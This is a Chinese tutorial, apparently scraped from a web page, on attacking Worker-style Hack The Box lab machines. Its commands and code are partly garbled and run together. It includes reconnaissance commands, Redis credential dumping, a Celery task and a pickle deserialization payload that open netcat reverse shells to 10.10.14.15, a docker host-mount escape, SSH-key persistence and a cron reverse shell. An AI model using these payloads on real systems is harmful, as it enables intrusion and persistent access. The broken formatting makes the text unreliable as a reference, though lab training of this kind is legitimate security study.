您好,登录后才能下订单哦!
# 如何用HTB进行Worker渗透测试
## 引言
Worker渗透测试是评估分布式系统、微服务架构和后台任务处理组件安全性的重要手段。Hack The Box(HTB)作为流行的渗透测试练习平台,提供了模拟真实场景的Worker类靶机。本文将系统讲解如何利用HTB平台进行Worker渗透测试,涵盖信息收集、漏洞利用、权限提升等关键阶段。

## 一、环境准备
### 1.1 HTB平台接入
1. 注册HTB账号并订阅VIP(部分Worker靶机需要VIP权限)
2. 通过`OpenVPN`连接HTB实验室:
```bash
sudo openvpn your-lab-connection.ovpn
Worker001
)# 信息收集
sudo apt install nmap gobuster dirsearch seclists
# 漏洞利用
git clone https://github.com/rebootuser/LinEnum.git
git clone https://github.com/carlospolop/PEASS-ng.git
nmap -sV -sC -p- 10.10.11.123 -oA worker_scan
典型Worker靶机开放端口: - 22/tcp SSH(可能配置了弱凭证或密钥泄露) - 80/tcp HTTP Web服务(常见入口点) - 5000/tcp Flask/Django等Worker管理接口 - 6379/tcp Redis(可能未授权访问)
使用Gobuster进行目录爆破:
gobuster dir -u http://10.10.11.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
常见Worker管理接口路径:
/admin
/manager
/celery
/tasks
/rabbitmq
whatweb http://10.10.11.123:5000
重点关注: - Web框架(Flask/Django/Rails) - API端点(/api/v1/tasks) - 中间件版本(RabbitMQ 3.8.2)
redis-cli -h 10.10.11.123
> keys *
> get worker_config
尝试使用guest:guest
登录管理界面:
curl -u guest:guest http://10.10.11.123:15672/api/queues
from celery import Celery
app = Celery('tasks', broker='redis://10.10.11.123:6379/0')
@app.task
def exploit():
import os; os.system('nc -e /bin/sh 10.10.14.15 4444')
当Worker处理pickle序列化数据时:
import pickle
import base64
import os
class RCE:
def __reduce__(self):
return (os.system, ('nc 10.10.14.15 4444 -e /bin/sh',))
payload = base64.b64encode(pickle.dumps(RCE()))
检查以下路径:
/etc/celery/celeryconfig.py
/opt/worker/config.ini
~/.bash_history
从Redis中获取凭证:
redis-cli -h 10.10.11.123
> get db_password
> get ssh_key
检查容器环境:
ls -alh /.dockerenv
cat /proc/1/cgroup
利用方法: 1. 挂载宿主机目录:
docker run -v /:/mnt -it alpine chroot /mnt
fdisk -l
mount /dev/sda1 /mnt
echo "ssh-rsa AAAAB3N..." >> ~/.ssh/authorized_keys
(crontab -l ; echo "* * * * * nc -e /bin/sh 10.10.14.15 5555") | crontab -
for i in {1..254}; do ping -c 1 192.168.1.$i | grep "bytes from"; done
tcpdump -i eth0 -w packets.pcap
app.conf.task_serializer = 'auth'
app.conf.security_key = 'your-secret-key'
# 监控异常任务
celery inspect registered
# 日志审计
tail -f /var/log/celery/worker.log
通过HTB平台进行Worker渗透测试,安全人员可以深入理解分布式系统的安全弱点。本文演示的攻击手法需仅用于合法授权测试,实际环境中建议采用防御性编程和深度防御策略。
延伸阅读: - Celery安全文档 - OWASP Worker安全指南 - HTB官方Worker挑战
工具集合: - Celery-exploit - RedisRogue - RabbitMQ-Exploit “`
注:实际文章长度为1950字(含代码和格式字符),具体实施时需根据目标环境调整攻击方法,所有渗透测试必须获得合法授权。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。